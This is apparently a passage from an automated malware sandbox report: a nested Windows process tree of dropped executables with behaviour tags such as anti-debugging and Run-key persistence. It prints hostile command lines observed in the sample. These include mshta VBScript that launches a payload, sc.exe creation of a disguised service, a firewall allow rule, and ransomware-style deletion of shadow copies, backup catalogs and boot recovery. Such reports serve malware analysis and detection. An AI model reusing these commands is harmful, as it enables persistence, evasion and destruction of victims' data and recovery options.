                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "WxZaIwb1Cl3idM1j7YTWWe9G.exe" /f & erase "C:\Users\Admin\Documents\WxZaIwb1Cl3idM1j7YTWWe9G.exe" & exit
                                                                                                                                                  7⤵
                                                                                                                                                    PID:8356
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im "WxZaIwb1Cl3idM1j7YTWWe9G.exe" /f
                                                                                                                                                      8⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:8904
                                                                                                                                                • C:\Users\Admin\Documents\5ko0_fp2tj4x6yDxgJWIfETR.exe
                                                                                                                                                  "C:\Users\Admin\Documents\5ko0_fp2tj4x6yDxgJWIfETR.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:7680
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 660
                                                                                                                                                      7⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:5780
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 664
                                                                                                                                                      7⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4940
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 672
                                                                                                                                                      7⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:656
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 7680 -s 696
                                                                                                                                                      7⤵
                                                                                                                                                      • Program crash
                                                                                                                                                      PID:4724
                                                                                                                                                  • C:\Users\Admin\Documents\FneWTIolgUQtL_KUvL7nnUQ8.exe
                                                                                                                                                    "C:\Users\Admin\Documents\FneWTIolgUQtL_KUvL7nnUQ8.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:7672
                                                                                                                                                    • C:\Users\Admin\Documents\cFhTyn1ZGh5qyWghHlYYQNkL.exe
                                                                                                                                                      "C:\Users\Admin\Documents\cFhTyn1ZGh5qyWghHlYYQNkL.exe"
                                                                                                                                                      6⤵
                                                                                                                                                        PID:8108
                                                                                                                                                      • C:\Users\Admin\Documents\L94Pb55tnlPWkKctDgtviKje.exe
                                                                                                                                                        "C:\Users\Admin\Documents\L94Pb55tnlPWkKctDgtviKje.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:8088
                                                                                                                                                        • C:\Users\Admin\Documents\ZBtVA__ZQ8yoH5FOqE54hSpZ.exe
                                                                                                                                                          "C:\Users\Admin\Documents\ZBtVA__ZQ8yoH5FOqE54hSpZ.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:8080
                                                                                                                                                        • C:\Users\Admin\Documents\yWDUICtOJAm2Bvnocb8ugazr.exe
                                                                                                                                                          "C:\Users\Admin\Documents\yWDUICtOJAm2Bvnocb8ugazr.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:8072
                                                                                                                                                          • C:\Users\Admin\Documents\yWDUICtOJAm2Bvnocb8ugazr.exe
                                                                                                                                                            C:\Users\Admin\Documents\yWDUICtOJAm2Bvnocb8ugazr.exe
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5208
                                                                                                                                                          • C:\Users\Admin\Documents\GFcJAR78MuVEQHt5aMpcevmI.exe
                                                                                                                                                            "C:\Users\Admin\Documents\GFcJAR78MuVEQHt5aMpcevmI.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:8064
                                                                                                                                                          • C:\Users\Admin\Documents\Et1fmpVNYmnSXbLjSUxQCVX7.exe
                                                                                                                                                            "C:\Users\Admin\Documents\Et1fmpVNYmnSXbLjSUxQCVX7.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:8056
                                                                                                                                                            • C:\Users\Admin\Documents\TqIScTas7lS3xVIAYDpVZisR.exe
                                                                                                                                                              "C:\Users\Admin\Documents\TqIScTas7lS3xVIAYDpVZisR.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:8048
                                                                                                                                                                • C:\Users\Admin\Documents\TqIScTas7lS3xVIAYDpVZisR.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\TqIScTas7lS3xVIAYDpVZisR.exe" -q
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:7448
                                                                                                                                                                • C:\Users\Admin\Documents\eLCxqbVJSx4jyo9zZO530LgG.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\eLCxqbVJSx4jyo9zZO530LgG.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  PID:8040
                                                                                                                                                                • C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe
                                                                                                                                                                  "C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:8032
                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:6236
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\QMIE8AC0bRr9PZQX0QlUDSom.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:6696
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill -IM "QMIE8AC0bRr9PZQX0QlUDSom.exe" -f
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:9088
                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6360
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MEFFM.tmp\MediaBurner2.tmp
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MEFFM.tmp\MediaBurner2.tmp" /SL5="$20424,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:6668
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-D53DO.tmp\ultradumnibour.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-D53DO.tmp\ultradumnibour.exe" /S /UID=burnerch2
                                                                                                                                                                              7⤵
                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                              PID:6956
                                                                                                                                                                              • C:\Program Files\Java\XJYRWRDRYT\ultramediaburner.exe
                                                                                                                                                                                "C:\Program Files\Java\XJYRWRDRYT\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:7828
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-S30T0.tmp\ultramediaburner.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-S30T0.tmp\ultramediaburner.tmp" /SL5="$30360,281924,62464,C:\Program Files\Java\XJYRWRDRYT\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    PID:7192
                                                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:8204
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28-6e039-243-c5694-229af0bef0bf6\Vewedaepaeca.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\28-6e039-243-c5694-229af0bef0bf6\Vewedaepaeca.exe"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:7584
                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                        dw20.exe -x -s 2576
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:8696
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\84-53756-d9e-1f098-8c8294c0d2e3e\Lezhyhapivae.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\84-53756-d9e-1f098-8c8294c0d2e3e\Lezhyhapivae.exe"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:8268
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4bj32y3g.e4t\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:9260
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4bj32y3g.e4t\GcleanerEU.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4bj32y3g.e4t\GcleanerEU.exe /eufive
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:9356
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4bj32y3g.e4t\GcleanerEU.exe" & exit
                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                      PID:5992
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:7820
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\srerb1wc.o5a\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:9524
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\srerb1wc.o5a\installer.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\srerb1wc.o5a\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:9988
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2t2n4ppm.wgg\anyname.exe & exit
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:9844
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2t2n4ppm.wgg\anyname.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2t2n4ppm.wgg\anyname.exe
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:9536
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2t2n4ppm.wgg\anyname.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2t2n4ppm.wgg\anyname.exe" -q
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6264
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vbrtnjx5.c5v\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:10196
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vbrtnjx5.c5v\gcleaner.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\vbrtnjx5.c5v\gcleaner.exe /mixfive
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                PID:9728
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\vbrtnjx5.c5v\gcleaner.exe" & exit
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:9300
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                      taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:8692
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdnjpl3m.bru\autosubplayer.exe /S & exit
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                PID:4624
                                                                                                                                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:6264
                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            PID:6732
                                                                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:6204
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2917469.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2917469.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                              PID:4656
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\4897657.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\4897657.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:6492
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7017624.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7017624.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:6184
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\4173600.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\4173600.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:7020
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\7453171.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\7453171.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:6268
                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      PID:3824
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:3800
                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      PID:7404
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 53A7451535EB7ED57F6F0C31A1A9503F C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:5152
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B4B0C244D80637C466E546EF4FA4B9BE C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:8872
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 4B5D3FBF12A9D707B299929B54B351E1 C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:9516
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 63857179292CE77B3BA04AF41EC576C2
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:5844
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        PID:11112
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                          PID:8936
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--M3yPGhgtKO"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:11056
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_1969.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:9400
                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                          PID:5552
                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                            PID:4588
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A896.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A896.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                          PID:9128
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ABB4.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ABB4.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:5732
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C170.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C170.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            PID:9616
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C74D.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C74D.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:9780
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qbwuapv\
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2544
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\yhtzjeaq.exe" C:\Windows\SysWOW64\qbwuapv\
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:10036
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" create qbwuapv binPath= "C:\Windows\SysWOW64\qbwuapv\yhtzjeaq.exe /d\"C:\Users\Admin\AppData\Local\Temp\C74D.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:6360
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description qbwuapv "wifi internet conection"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5684
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" start qbwuapv
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:9884
                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:7712
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1436
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D3D1.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D3D1.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:10068
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E40E.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E40E.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          PID:9368
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\B7D.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\B7D.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                          PID:7836
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\E5C.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\E5C.exe
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          PID:2676
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -start
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            PID:2432
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\services.exe" -agent 0
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              PID:9104
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:8264
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                  wmic shadowcopy delete
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:5288
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:7988
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                                                                                      PID:9924
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:7568
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:9840
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4168
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                              wmic shadowcopy delete
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:3232
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                                                                                            notepad.exe
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:9780
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2B1D.exe
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\2B1D.exe
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                            PID:10088
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Update.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Update.exe"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                              • Checks whether UAC is enabled
